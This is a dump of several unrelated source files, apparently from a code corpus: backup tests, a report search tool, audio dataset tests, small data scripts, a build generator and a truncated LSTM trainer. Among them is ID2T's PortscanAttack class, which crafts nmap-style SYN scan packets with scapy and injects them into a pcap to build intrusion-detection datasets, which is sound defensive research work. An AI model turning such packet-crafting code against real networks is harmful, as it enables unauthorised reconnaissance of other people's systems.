            }
        }, {
            'file_done': {
                'sha3_512': 'd318a04d4a61bcb9f2f10a9523c30cfef69922fea0a3c4c1c7f5f01fed01cea9ee4a9a14e29126fadb0427eae42df1efa8a0cd18eb0d75a96241a1da432dbe8d'
            }
        }, {
            'done': {
                'backup_id': backup_id,
                'date': meta_content[-1]['done']['date'],
            }
        }
    ]
def test_incremental_backup_and_restore(temp_dir, sample_age_key):
    """Verify that a second backup after a small in-place change produces a
    much smaller data file (incremental), and still restores correctly."""
    (temp_dir / 'src').mkdir()
    (temp_dir / 'src/hello.txt').write_text('Hello, World!\n')
    # 3 MiB of random data dominates the first backup's size.
    (temp_dir / 'src/big').write_bytes(os.urandom(3 * 2**20))
    backend = FileBackend(temp_dir / 'backup_target')
    backup_result = backup(temp_dir / 'src', backend=backend, recipients=[sample_age_key], recipients_files=[])
    backup_id_1 = backup_result.backup_id
    # Backup ids are second-resolution timestamps; wait until the clock
    # ticks so the second backup gets a distinct id.
    while datetime.utcnow().strftime('%Y%m%dT%H%M%SZ') == backup_result.backup_id:
        sleep(0.05)
    # Overwrite only the first 100 bytes of the big file.
    with (temp_dir / 'src/big').open(mode='r+b') as f:
        f.write(os.urandom(100))
    backend = FileBackend(temp_dir / 'backup_target')
    backup_result = backup(temp_dir / 'src', backend=backend, recipients=[sample_age_key], recipients_files=[])
    backup_id_2 = backup_result.backup_id
    # First data file holds the full ~3 MiB; the incremental one must be
    # substantially smaller since only changed blocks are stored.
    assert (temp_dir / 'backup_target' / f'baq.{backup_id_1}.data.00000').is_file()
    assert (temp_dir / 'backup_target' / f'baq.{backup_id_1}.data.00000').stat().st_size > 3000000
    assert (temp_dir / 'backup_target' / f'baq.{backup_id_2}.data.00000').is_file()
    assert (temp_dir / 'backup_target' / f'baq.{backup_id_2}.data.00000').stat().st_size < 1500000
    (temp_dir / 'restored').mkdir()
    restore(temp_dir / 'restored', backend, backup_id_2, [temp_dir / 'age_key'])
    assert (temp_dir / 'src/hello.txt').read_bytes() == (temp_dir / 'restored/hello.txt').read_bytes()
    #assert (temp_dir / 'src/dir1/sample.txt').read_bytes() == (temp_dir / 'restored/dir1/sample.txt').read_bytes()
| 2.03125 | 2 |
external/artifacts/fv3net/artifacts/report_search.py | ai2cm/fv3net | 1 | 12761484 | <filename>external/artifacts/fv3net/artifacts/report_search.py<gh_stars>1-10
import asyncio
import dataclasses
import json
import itertools
import os
from typing import Mapping, Optional, Sequence, Set
import gcsfs
import fsspec
from .utils import _list, _cat_file, _close_session
@dataclasses.dataclass
class ReportIndex:
    """Mapping from run urls to sequences of report urls."""

    # run URL -> list of report URLs that mention that run
    reports_by_run: Mapping[str, Sequence[str]] = dataclasses.field(
        default_factory=dict
    )

    @property
    def reports(self) -> Set[str]:
        """The available reports."""
        _reports = [v for v in self.reports_by_run.values()]
        return set(itertools.chain.from_iterable(_reports))

    def compute(self, url, filename="index.html"):
        """Compute reports_by_run index from all reports found at url.

        Args:
            url: path to directory containing report subdirectories.
            filename: name of report html files.

        Note:
            Reports are assumed to be located at {url}/*/{filename}.
        """
        loop = asyncio.get_event_loop()
        # Use an async GCS filesystem for gs:// urls so report heads can be
        # fetched concurrently; fall back to the local filesystem otherwise.
        if url.startswith("gs://"):
            fs = gcsfs.GCSFileSystem(asynchronous=True)
        else:
            fs = fsspec.filesystem("file")
        self.reports_by_run = loop.run_until_complete(
            self._get_reports(fs, url, filename)
        )
        loop.run_until_complete(_close_session(fs))

    @staticmethod
    def from_json(url: str) -> "ReportIndex":
        """Initialize from existing JSON file."""
        with fsspec.open(url) as f:
            index = ReportIndex(json.load(f))
        return index

    def public_links(self, run_url: str) -> Sequence[str]:
        """Return public links for all reports containing a run_url."""
        if run_url not in self.reports_by_run:
            print(f"Provided URL {run_url} not found in any report.")
            public_links = []
        else:
            public_links = [
                self._insert_public_domain(report_url)
                for report_url in self.reports_by_run[run_url]
            ]
        return public_links

    def dump(self, url: str):
        """Serialize the index to *url* as pretty-printed JSON."""
        with fsspec.open(url, "w") as f:
            json.dump(self.reports_by_run, f, sort_keys=True, indent=4)

    async def _get_reports(self, fs, url, filename) -> Mapping[str, Sequence[str]]:
        """Generate mapping from run URL to report URLs for all reports found at
        {url}/*/{filename}."""
        out = {}
        for report_dir in await _list(fs, url):
            report_url = self._url_prefix(fs) + os.path.join(report_dir, filename)
            try:
                # Only the first 5 KiB are read: run URLs appear near the
                # top of the report HTML.
                report_head = await _cat_file(fs, report_url, end=5 * 1024)
            except FileNotFoundError:
                pass
            else:
                report_lines = report_head.decode("UTF-8").split("\n")
                for line in report_lines:
                    run_url = _get_run_url(line)
                    if run_url:
                        out.setdefault(run_url, []).append(report_url)
        return out

    @staticmethod
    def _url_prefix(fs) -> str:
        # fsspec listings drop the scheme; re-add it for GCS paths.
        if isinstance(fs, gcsfs.GCSFileSystem):
            return "gs://"
        elif isinstance(fs, fsspec.implementations.local.LocalFileSystem):
            return ""
        else:
            raise ValueError(f"Protocol prefix unknown for {fs}.")

    @staticmethod
    def _insert_public_domain(url) -> str:
        # Rewrite gs:// URLs to their public HTTPS equivalents; local
        # absolute paths are returned unchanged.
        if url.startswith("gs://"):
            return url.replace("gs://", "https://storage.googleapis.com/")
        elif url.startswith("/"):
            return url
        else:
            raise ValueError(f"Public domain unknown for url {url}.")
def _get_run_url(line: str) -> Optional[str]:
if "<td> gs://" in line:
# handles older style reports
return line.split("<td>")[1].split("</td>")[0].strip()
elif '": "gs://' in line:
# handles newer style reports generated after
# https://github.com/ai2cm/fv3net/pull/1304
return line.split(": ")[1].strip('",')
else:
return None
def main(args):
    """CLI entry point: optionally rebuild the report index, then print the
    public links of every report that references the given run URL."""
    index_path = os.path.join(args.reports_url, "index.json")
    if args.write:
        fresh_index = ReportIndex()
        fresh_index.compute(args.reports_url)
        fresh_index.dump(index_path)
    for public_link in ReportIndex.from_json(index_path).public_links(args.url):
        print(public_link)
def register_parser(subparsers):
    """Attach the 'report' subcommand and its arguments to *subparsers*."""
    report_parser = subparsers.add_parser(
        "report", help="Search for prognostic run reports."
    )
    report_parser.add_argument("url", help="A prognostic run URL.")
    reports_url_help = (
        "Location of prognostic run reports. Defaults to gs://vcm-ml-public/argo. "
        "Search uses index at REPORTS_URL/index.json"
    )
    report_parser.add_argument(
        "-r",
        "--reports-url",
        default="gs://vcm-ml-public/argo",
        help=reports_url_help,
    )
    report_parser.add_argument(
        "-w",
        "--write",
        action="store_true",
        help="Recompute index and write to REPORTS_URL/index.json before searching.",
    )
    report_parser.set_defaults(func=main)
| 2.328125 | 2 |
code/Attack/PortscanAttack.py | TomasMadeja/ID2T | 33 | 12761485 | import logging
import random as rnd
import lea
import scapy.layers.inet as inet
import Attack.BaseAttack as BaseAttack
import Lib.Utility as Util
from Attack.Parameter import Parameter, Boolean, Float, IPAddress, MACAddress, Port
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# noinspection PyPep8
class PortscanAttack(BaseAttack.BaseAttack):
    """Injects an nmap-style TCP SYN 'regular scan' (requests plus
    SYN/ACK + RST replies for open ports) into the output pcap."""

    # Parameter-name constants used to look up attack configuration values.
    PORT_SOURCE = 'port.src'
    PORT_DESTINATION = 'port.dst'
    PORT_OPEN = 'port.open'
    PORT_DEST_SHUFFLE = 'port.dst.shuffle'
    PORT_DEST_ORDER_DESC = 'port.dst.order-desc'
    IP_SOURCE_RANDOMIZE = 'ip.src.shuffle'
    PORT_SOURCE_RANDOMIZE = 'port.src.shuffle'

    def __init__(self):
        """
        Creates a new instance of the PortscanAttack.
        This attack injects TCP Syn-requests and respective responses into the output pcap file.
        """
        # Initialize attack
        super(PortscanAttack, self).__init__("Portscan Attack", "Injects a nmap 'regular scan'",
                                             "Scanning/Probing")

        # Define allowed parameters and their type
        self.update_params([
            Parameter(self.IP_SOURCE, IPAddress()),
            Parameter(self.IP_DESTINATION, IPAddress()),
            Parameter(self.PORT_SOURCE, Port()),
            Parameter(self.PORT_DESTINATION, Port()),
            Parameter(self.PORT_OPEN, Port()),
            Parameter(self.MAC_SOURCE, MACAddress()),
            Parameter(self.MAC_DESTINATION, MACAddress()),
            Parameter(self.PORT_DEST_SHUFFLE, Boolean()),
            Parameter(self.PORT_DEST_ORDER_DESC, Boolean()),
            Parameter(self.IP_SOURCE_RANDOMIZE, Boolean()),
            Parameter(self.PACKETS_PER_SECOND, Float()),
            Parameter(self.PORT_SOURCE_RANDOMIZE, Boolean())
        ])

    def init_param(self, param: str) -> bool:
        """
        Initialize a parameter with a default value specified in the specific attack.

        :param param: parameter, which should be initialized
        :return: True if initialization was successful, False if not
        """
        value = None
        if param == self.IP_SOURCE:
            value = self.statistics.get_most_used_ip_address()
        elif param == self.IP_SOURCE_RANDOMIZE:
            value = 'False'
        elif param == self.MAC_SOURCE:
            ip_src = self.get_param_value(self.IP_SOURCE)
            if ip_src is None:
                return False
            value = self.get_mac_address(ip_src)
        # NOTE(review): duplicate of the IP_SOURCE_RANDOMIZE branch above;
        # this elif is unreachable and could be removed.
        elif param == self.IP_SOURCE_RANDOMIZE:
            value = 'False'
        elif param == self.IP_DESTINATION:
            ip_src = self.get_param_value(self.IP_SOURCE)
            if ip_src is None:
                return False
            value = self.statistics.get_random_ip_address(ips=[ip_src])
        elif param == self.MAC_DESTINATION:
            ip_dst = self.get_param_value(self.IP_DESTINATION)
            if ip_dst is None:
                return False
            value = self.get_mac_address(ip_dst)
        elif param == self.PORT_DESTINATION:
            # Default scan target: the top-1000 nmap service ports.
            value = self.get_ports_from_nmap_service_dst(1000)
        elif param == self.PORT_OPEN:
            # Sentinel '1' means "derive open ports from statistics later".
            value = '1'
        elif param == self.PORT_DEST_SHUFFLE:
            value = 'False'
        elif param == self.PORT_DEST_ORDER_DESC:
            value = 'False'
        elif param == self.PORT_SOURCE:
            value = rnd.randint(1024, 65535)
        elif param == self.PORT_SOURCE_RANDOMIZE:
            value = 'False'
        elif param == self.PACKETS_PER_SECOND:
            value = self.statistics.get_most_used_pps()
        elif param == self.INJECT_AFTER_PACKET:
            value = rnd.randint(0, self.statistics.get_packet_count())
        if value is None:
            return False
        return self.add_param_value(param, value)

    def generate_attack_packets(self):
        """
        Creates the attack packets.
        """
        mac_source = self.get_param_value(self.MAC_SOURCE)
        mac_destination = self.get_param_value(self.MAC_DESTINATION)

        # Determine ports
        dest_ports = self.get_param_value(self.PORT_DESTINATION)
        if self.get_param_value(self.PORT_DEST_ORDER_DESC):
            dest_ports.reverse()
        elif self.get_param_value(self.PORT_DEST_SHUFFLE):
            rnd.shuffle(dest_ports)
        if self.get_param_value(self.PORT_SOURCE_RANDOMIZE):
            # FIXME: why is sport never used?
            # NOTE(review): this value is overwritten per-packet below
            # (sport = rnd.randint(1, 65535)), so the PORT_SOURCE /
            # PORT_SOURCE_RANDOMIZE parameters currently have no effect.
            sport = rnd.randint(1, 65535)
        else:
            sport = self.get_param_value(self.PORT_SOURCE)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(self.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        ip_source = self.get_param_value(self.IP_SOURCE)
        if isinstance(ip_source, list):
            ip_source = ip_source[0]
        ip_destination = self.get_param_value(self.IP_DESTINATION)
        if not isinstance(ip_destination, list):
            ip_destination = [ip_destination]

        # Check ip.src == ip.dst
        self.ip_src_dst_catch_equal(ip_source, ip_destination)

        for ip in ip_destination:
            # Select open ports
            ports_open = self.get_param_value(self.PORT_OPEN)
            if ports_open == 1:  # user did not specify open ports
                # the ports that were already used by ip.dst (direction in) in the background traffic are open ports
                ports_used_by_ip_dst = self.statistics.process_db_query(
                    "SELECT portNumber FROM ip_ports WHERE portDirection='in' AND ipAddress='" + ip + "'")
                if ports_used_by_ip_dst:
                    ports_open = ports_used_by_ip_dst
                else:  # if no ports were retrieved from database
                    # Take open ports from nmap-service file
                    # ports_temp = self.get_ports_from_nmap_service_dst(100)
                    # ports_open = ports_temp[0:rnd.randint(1,10)]
                    # OR take open ports from the most used ports in traffic statistics
                    ports_open = self.statistics.process_db_query(
                        "SELECT portNumber FROM ip_ports GROUP BY portNumber ORDER BY SUM(portCount) DESC LIMIT " + str(
                            rnd.randint(1, 10)))
            # in case of one open port, convert ports_open to array
            if not isinstance(ports_open, list):
                ports_open = [ports_open]

            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
            source_mss_dist = self.statistics.get_mss_distribution(ip_source)
            if len(source_mss_dist) > 0:
                source_mss_prob_dict = lea.Lea.fromValFreqsDict(source_mss_dist)
                source_mss_value = source_mss_prob_dict.random()
            else:
                source_mss_value = Util.handle_most_used_outputs(self.statistics.get_most_used_mss_value())
            destination_mss_dist = self.statistics.get_mss_distribution(ip)
            if len(destination_mss_dist) > 0:
                destination_mss_prob_dict = lea.Lea.fromValFreqsDict(destination_mss_dist)
                destination_mss_value = destination_mss_prob_dict.random()
            else:
                destination_mss_value = Util.handle_most_used_outputs(self.statistics.get_most_used_mss_value())

            # Set TTL based on TTL distribution of IP address
            source_ttl_dist = self.statistics.get_ttl_distribution(ip_source)
            if len(source_ttl_dist) > 0:
                source_ttl_prob_dict = lea.Lea.fromValFreqsDict(source_ttl_dist)
                source_ttl_value = source_ttl_prob_dict.random()
            else:
                source_ttl_value = Util.handle_most_used_outputs(self.statistics.get_most_used_ttl_value())
            destination_ttl_dist = self.statistics.get_ttl_distribution(ip)
            if len(destination_ttl_dist) > 0:
                destination_ttl_prob_dict = lea.Lea.fromValFreqsDict(destination_ttl_dist)
                destination_ttl_value = destination_ttl_prob_dict.random()
            else:
                destination_ttl_value = Util.handle_most_used_outputs(self.statistics.get_most_used_ttl_value())

            # Set Window Size based on Window Size distribution of IP address
            source_win_dist = self.statistics.get_win_distribution(ip_source)
            if len(source_win_dist) > 0:
                source_win_prob_dict = lea.Lea.fromValFreqsDict(source_win_dist)
                source_win_value = source_win_prob_dict.random()
            else:
                source_win_value = Util.handle_most_used_outputs(self.statistics.get_most_used_win_size())
            destination_win_dist = self.statistics.get_win_distribution(ip)
            if len(destination_win_dist) > 0:
                destination_win_prob_dict = lea.Lea.fromValFreqsDict(destination_win_dist)
                destination_win_value = destination_win_prob_dict.random()
            else:
                destination_win_value = Util.handle_most_used_outputs(self.statistics.get_most_used_win_size())

            min_delay, max_delay = self.get_reply_latency(ip_source, ip)

            for dport in dest_ports:
                # Parameters changing each iteration
                if self.get_param_value(self.IP_SOURCE_RANDOMIZE) and isinstance(ip_source, list):
                    ip_source = rnd.choice(ip_source)

                # 1) Build request package
                request_ether = inet.Ether(src=mac_source, dst=mac_destination)
                request_ip = inet.IP(src=ip_source, dst=ip, ttl=source_ttl_value)
                # Random src port for each packet
                sport = rnd.randint(1, 65535)
                request_tcp = inet.TCP(sport=sport, dport=dport, window=source_win_value, flags='S',
                                       options=[('MSS', source_mss_value)])
                request = (request_ether / request_ip / request_tcp)
                request.time = timestamp_next_pkt
                # Append request
                self.add_packet(request, ip_source, ip)

                # 2) Build reply (for open ports) package
                if dport in ports_open:  # destination port is OPEN
                    reply_ether = inet.Ether(src=mac_destination, dst=mac_source)
                    reply_ip = inet.IP(src=ip, dst=ip_source, ttl=destination_ttl_value, flags='DF')
                    reply_tcp = inet.TCP(sport=dport, dport=sport, seq=0, ack=1, flags='SA', window=destination_win_value,
                                         options=[('MSS', destination_mss_value)])
                    reply = (reply_ether / reply_ip / reply_tcp)
                    timestamp_reply = self.timestamp_controller.next_timestamp(latency=min_delay)
                    reply.time = timestamp_reply
                    self.add_packet(reply, ip_source, ip)

                    # requester confirms (RST, as nmap does after a SYN/ACK)
                    confirm_ether = request_ether
                    confirm_ip = request_ip
                    confirm_tcp = inet.TCP(sport=sport, dport=dport, seq=1, window=0, flags='R')
                    confirm = (confirm_ether / confirm_ip / confirm_tcp)
                    self.timestamp_controller.set_timestamp(timestamp_reply)
                    timestamp_confirm = self.timestamp_controller.next_timestamp(latency=min_delay)
                    confirm.time = timestamp_confirm
                    self.add_packet(confirm, ip_source, ip)

                # else: destination port is NOT OPEN -> no reply is sent by target
                self.timestamp_controller.set_timestamp(timestamp_next_pkt)
                timestamp_next_pkt = self.timestamp_controller.next_timestamp()

    def generate_attack_pcap(self):
        """
        Creates a pcap containing the attack packets.

        :return: The location of the generated pcap file.
        """
        # store end time of attack
        self.attack_end_utime = self.packets[-1].time

        # write attack packets to pcap
        pcap_path = self.write_attack_pcap(sorted(self.packets, key=lambda pkt: pkt.time))

        # return packets sorted by packet time_sec_start
        return len(self.packets), pcap_path
| 2.65625 | 3 |
tests/datasets/test_eigenscape_raw.py | lucaspbastos/soundata | 177 | 12761486 | <filename>tests/datasets/test_eigenscape_raw.py<gh_stars>100-1000
import numpy as np
from tests.test_utils import run_clip_tests
from soundata import annotations
from soundata.datasets import eigenscape_raw
TEST_DATA_HOME = "tests/resources/sound_datasets/eigenscape_raw"
def test_clip():
    """A clip exposes the expected attributes and property types."""
    dataset = eigenscape_raw.Dataset(TEST_DATA_HOME)
    clip = dataset.clip("Beach-01-Raw")

    attributes = {
        "audio_path": (
            "tests/resources/sound_datasets/eigenscape_raw/Beach-01-Raw.wav"
        ),
        "clip_id": "Beach-01-Raw",
    }
    property_types = {
        "audio": tuple,
        "tags": annotations.Tags,
        "location": str,
        "date": str,
        "time": str,
        "additional_information": str,
    }
    run_clip_tests(clip, attributes, property_types)
def test_load_audio():
    """Audio loads as a 32-channel (4th-order HOA) array at 48 kHz."""
    clip = eigenscape_raw.Dataset(TEST_DATA_HOME).clip("Beach-01-Raw")
    audio, sr = eigenscape_raw.load_audio(clip.audio_path)
    assert sr == 48000
    assert type(audio) is np.ndarray
    assert len(audio.shape) == 2  # audio loaded as a 2-D array
    assert audio.shape[0] == 32  # 32 channels (HOA 4th order)
    assert audio.shape[1] == 48000 * 1.0  # one second of samples
def test_load_tags():
    """The clip carries a single 'Beach' tag with full confidence."""
    clip = eigenscape_raw.Dataset(TEST_DATA_HOME).clip("Beach-01-Raw")
    tags = clip.tags
    assert len(tags.labels) == 1
    assert tags.labels[0] == "Beach"
    assert np.allclose([1.0], tags.confidence)
def test_load_metadata():
    """Recording metadata (location, time, date) is parsed correctly."""
    clip = eigenscape_raw.Dataset(TEST_DATA_HOME).clip("Beach-01-Raw")
    assert clip.location == "Bridlington Beach"
    assert clip.time == "10:42"
    assert clip.date == "09/05/2017"
    assert clip.additional_information == ""
def test_to_jams():
    """The JAMS export carries the clip's tag and recording metadata."""
    jam = eigenscape_raw.Dataset(TEST_DATA_HOME).clip("Beach-01-Raw").to_jams()
    assert jam.validate()

    # Tag annotation checks
    tag_data = jam.search(namespace="tag_open")[0]["data"]
    assert len(tag_data) == 1
    record = tag_data[0]
    assert record.time == 0
    assert record.duration == 1.0
    assert record.value == "Beach"
    assert record.confidence == 1

    # Metadata checks
    assert jam.file_metadata.duration == 1.0
    assert jam.sandbox.location == "Bridlington Beach"
    assert jam.sandbox.time == "10:42"
    assert jam.sandbox.date == "09/05/2017"
    assert jam.annotations[0].annotation_metadata.data_source == "soundata"
| 2.390625 | 2 |
data_pre_processing.py | Jorge-Nario/cs542 | 0 | 12761487 | <gh_stars>0
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
# Two alternative feature scalers; the one actually applied is selected
# inside pre_process_data (currently StandardScaler).
scaler1 = MinMaxScaler(feature_range=(0, 1))
scaler0 = StandardScaler()
# Importing sample data.
# NOTE(review): absolute, machine-specific paths -- make these configurable
# before running anywhere else.
news_data = pd.read_csv("/Users/jonathanhale/Documents/Courses/Machine Learning/example_data/news_sample (1).csv")
mkt_data = pd.read_csv("/Users/jonathanhale/Documents/Courses/Machine Learning/example_data/marketdata_sample (1).csv")
def pre_process_data(news_data, mkt_data):
    """Drop unused columns, convert timestamps, and scale numeric features.

    Both frames are modified in place (drops and scaled columns) and also
    returned for convenience.
    """
    # Remove columns not used downstream.
    news_data.drop(['time',
                    'sourceTimestamp',
                    'sourceId'],
                   axis=1, inplace=True)
    mkt_data.drop(['time',
                   'close',
                   'open',
                   'returnsClosePrevMktres1',
                   'returnsOpenPrevMktres1',
                   'returnsClosePrevMktres10',
                   'returnsOpenPrevMktres10'],
                  axis=1, inplace=True)

    # Convert 'firstCreated' timestamps to numeric epoch seconds.
    news_data['firstCreated'] = pd.to_datetime(news_data["firstCreated"])
    news_data['firstCreated'] = (pd.DataFrame((news_data['firstCreated'] -
                                 pd.Timestamp("1970-01-01")) // pd.Timedelta('1s')))

    # Numeric news columns to scale: named features plus columns 15..31
    # (positions taken after the drops above).
    news_numeric = ['bodySize',
                    'urgency',
                    'firstCreated',
                    'takeSequence',
                    'sentenceCount',
                    'companyCount',
                    'wordCount'] + list(news_data)[15:32]

    # Numeric market columns to scale: 'volume' plus columns 4..7.
    mkt_numeric = ['volume'] + list(mkt_data)[4:8]

    # SCALING: StandardScaler (zero mean, unit variance) is active.
    # A MinMax alternative exists as module-level `scaler1` if [0, 1]
    # scaling is preferred.
    news_data[news_numeric] = scaler0.fit_transform(news_data[news_numeric])
    mkt_data[mkt_numeric] = scaler0.fit_transform(mkt_data[mkt_numeric])

    return news_data, mkt_data
# Run the pipeline on the sample frames and print the result for inspection.
[processed_news_data, processed_mkt_data] = pre_process_data(news_data, mkt_data)
print(processed_news_data)
print(processed_mkt_data)
| 3.015625 | 3 |
CH10/selective_copy/selective_copy.py | kaifee-haque/Automate-the-Boring-Stuff-Solutions | 0 | 12761488 | #! python3
"""Walks through a folder tree and copies every file with a given extensison
to a new folder."""
import os, sys, shutil
from pathlib import Path
def main(args):
    """Walk the current working directory tree and copy every file whose name
    ends with the extension ``args[1]`` into the folder ``args[2]`` (created
    under the current working directory on first match).

    :param args: command-line argument list: [script, extension, dest_folder]
    """
    dest = Path(Path.cwd(), args[2])
    for folder, subfolders, files in os.walk(Path.cwd()):
        # Do not descend into the destination folder, otherwise files already
        # copied there would be rediscovered (and copied onto themselves).
        subfolders[:] = [d for d in subfolders if Path(folder, d) != dest]
        for file in files:
            # BUG FIX: the suffix length was previously taken from the
            # destination folder name (args[2]) instead of the extension.
            if file.endswith(args[1]):
                if not dest.exists():
                    os.mkdir(dest)
                # BUG FIX: copy from the folder being walked, not from the
                # current working directory (subfolder files failed before).
                shutil.copy(Path(folder, file), dest)
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python selective_copy.py <file extension> <new folder>")
print("Example python selective_copy.py .txt text_files")
sys.exit()
else:
main(sys.argv)
| 4.1875 | 4 |
psm.py | armandoblanco/iotedgedemo | 0 | 12761489 | test = 'pablo'
| 1.09375 | 1 |
icecrate/web/tags.py | Artanis/icecrate | 1 | 12761490 | <reponame>Artanis/icecrate
from operator import itemgetter
from pydispatch import dispatcher
import bottle
import icecrate.tags
from icecrate import database
from icecrate import utils
app = bottle.Bottle()
@app.route("/")
@bottle.view("tags_all")
def list_tags():
tags = list(map(icecrate.tags.by_tag_id, icecrate.tags.all_tags()))
print(tags)
tags = sorted(tags, key=itemgetter("name"), reverse=True)
return {"tags": tags}
@app.route("/<tag_id>")
@bottle.view("tags_one.tpl")
def show_tag(tag_id):
taginfo = icecrate.tags.by_tag_id(tag_id)
# get tag members from indexer
members = list(icecrate.search.query("tags:{0}".format(tag_id)))
return {"taginfo": taginfo , "members": members}
| 2.375 | 2 |
src/boringssl/gen_build_yaml.py | kkwell/grpc | 0 | 12761491 | <reponame>kkwell/grpc<gh_stars>0
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sys
import yaml
# Locate the boringssl sources.json manifest relative to this script;
# fall back to the alternate (internal) checkout layout if the first
# path does not exist.
run_dir = os.path.dirname(sys.argv[0])
sources_path = os.path.abspath(
    os.path.join(run_dir,
                 '../../third_party/boringssl-with-bazel/sources.json'))
try:
    with open(sources_path, 'r') as s:
        sources = json.load(s)
except IOError:
    sources_path = os.path.abspath(
        os.path.join(run_dir,
                     '../../../../third_party/openssl/boringssl/sources.json'))
    with open(sources_path, 'r') as s:
        sources = json.load(s)
def map_dir(filename):
    """Prefix *filename* with the boringssl-with-bazel third_party directory."""
    return 'third_party/boringssl-with-bazel/{0}'.format(filename)
class Grpc(object):
    """Adapter for boring-SSL json sources files. """

    def __init__(self, sources):
        """Build the gRPC build.yaml structure from the boringssl manifest."""
        self.yaml = None
        self.WriteFiles(sources)

    def WriteFiles(self, files):
        """Populate ``self.yaml`` with libs, test targets and tests derived
        from the boringssl ``sources.json`` file lists."""
        test_binaries = ['ssl_test', 'crypto_test']
        self.yaml = {
            '#':
                'generated with src/boringssl/gen_build_yaml.py',
            'raw_boringssl_build_output_for_debugging': {
                'files': files,
            },
            'libs': [
                {
                    'name':
                        'boringssl',
                    'build':
                        'private',
                    'language':
                        'c',
                    'secure':
                        False,
                    'src':
                        sorted(
                            map_dir(f) for f in files['ssl'] + files['crypto']),
                    'headers':
                        sorted(
                            map_dir(f)
                            # We want to include files['fips_fragments'], but not build them as objects.
                            # See https://boringssl-review.googlesource.com/c/boringssl/+/16946
                            for f in files['ssl_headers'] +
                            files['ssl_internal_headers'] +
                            files['crypto_headers'] +
                            files['crypto_internal_headers'] +
                            files['fips_fragments']),
                    'boringssl':
                        True,
                    'defaults':
                        'boringssl',
                },
                {
                    'name': 'boringssl_test_util',
                    'build': 'private',
                    'language': 'c++',
                    'secure': False,
                    'boringssl': True,
                    'defaults': 'boringssl',
                    'src': [map_dir(f) for f in sorted(files['test_support'])],
                }
            ],
            # One buildable test binary per entry in test_binaries.
            'targets': [{
                'name': 'boringssl_%s' % test,
                'build': 'test',
                'run': False,
                'secure': False,
                'language': 'c++',
                'src': sorted(map_dir(f) for f in files[test]),
                'vs_proj_dir': 'test/boringssl',
                'boringssl': True,
                'defaults': 'boringssl',
                'deps': [
                    'boringssl_test_util',
                    'boringssl',
                ]
            } for test in test_binaries],
            # Matching test-runner entries for the same binaries.
            'tests': [{
                'name': 'boringssl_%s' % test,
                'args': [],
                'exclude_configs': ['asan', 'ubsan'],
                'ci_platforms': ['linux', 'mac', 'posix', 'windows'],
                'platforms': ['linux', 'mac', 'posix', 'windows'],
                'flaky': False,
                'gtest': True,
                'language': 'c++',
                'boringssl': True,
                'defaults': 'boringssl',
                'cpu_cost': 1.0
            } for test in test_binaries]
        }
# Generate the YAML build description and emit it on stdout.
grpc_platform = Grpc(sources)
print(yaml.dump(grpc_platform.yaml))
| 1.992188 | 2 |
lstm_model_train.py | xingkong1983/ai-sentiment-analysis | 0 | 12761492 | import pickle
import numpy as np
import pandas as pd
from keras.utils import np_utils
from keras.utils.vis_utils import plot_model
from keras.models import Sequential
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM, Dense, Embedding, Dropout
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from tensorflow.keras.callbacks import TensorBoard
import time
# Timestamped run name used for the TensorBoard log directory.
NAME = 'lstm-{}'.format(int(time.time()))
tensorboard = TensorBoard(log_dir='./logs/{}'.format(NAME))
# Load the data.
# In the input file the feature column is CONTENT and the class column is label.
def load_data(filepath, input_shape=20):
    """Read the CSV at *filepath* and build character-level training data.

    Side effects: writes the char->index and label->index dictionaries to
    ./data/lstm/word_dict.pk and ./data/lstm/label_dict.pk.

    Returns (x, y, output_dictionary, vocab_size, label_size,
    inverse_word_dictionary).
    """
    df = pd.read_csv(filepath)
    # Labels and vocabulary
    labels, vocabulary = list(df['label'].unique()), list(df['CONTENT'].unique())
    # Build character-level features (the vocabulary is the set of characters)
    string = ''
    for word in vocabulary:
        string += word
    vocabulary = set(string)
    # Dictionaries mapping characters/labels to indices (0 reserved for padding)
    # NOTE(review): vocabulary is a set, so character indices can vary between
    # runs (str hash randomization) -- the pickled dictionaries must be reused
    # at inference time.
    word_dictionary = {word: i+1 for i, word in enumerate(vocabulary)}
    with open('./data/lstm/word_dict.pk', 'wb') as f:
        pickle.dump(word_dictionary, f)
    inverse_word_dictionary = {i+1: word for i, word in enumerate(vocabulary)}
    label_dictionary = {label: i for i, label in enumerate(labels)}
    with open('./data/lstm/label_dict.pk', 'wb') as f:
        pickle.dump(label_dictionary, f)
    output_dictionary = {i: labels for i, labels in enumerate(labels)}
    vocab_size = len(word_dictionary.keys())  # vocabulary size
    label_size = len(label_dictionary.keys())  # number of label classes
    # Pad sequences to input_shape; shorter sequences are padded with 0
    x = [[word_dictionary[word] for word in sent] for sent in df['CONTENT']]
    x = pad_sequences(maxlen=input_shape, sequences=x, padding='post', value=0)
    y = [[label_dictionary[sent]] for sent in df['label']]
    y = [np_utils.to_categorical(label, num_classes=label_size) for label in y]
    y = np.array([list(_[0]) for _ in y])
    return x, y, output_dictionary, vocab_size, label_size, inverse_word_dictionary
# Build the deep-learning model: Embedding + LSTM + Softmax.
def create_LSTM(n_units, input_shape, output_dim, filepath):
    """Construct, compile and summarise the Embedding+LSTM+Softmax classifier.

    Also writes an architecture diagram to ./data/img/model_lstm.png.
    """
    features, _y, _out_dict, vocab_size, label_size, _inv_dict = load_data(filepath)
    model = Sequential()
    for layer in (
        Embedding(input_dim=vocab_size + 1, output_dim=output_dim,
                  input_length=input_shape, mask_zero=True),
        LSTM(n_units, input_shape=(features.shape[0], features.shape[1])),
        Dropout(0.2),
        Dense(label_size, activation='softmax'),
    ):
        model.add(layer)
    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
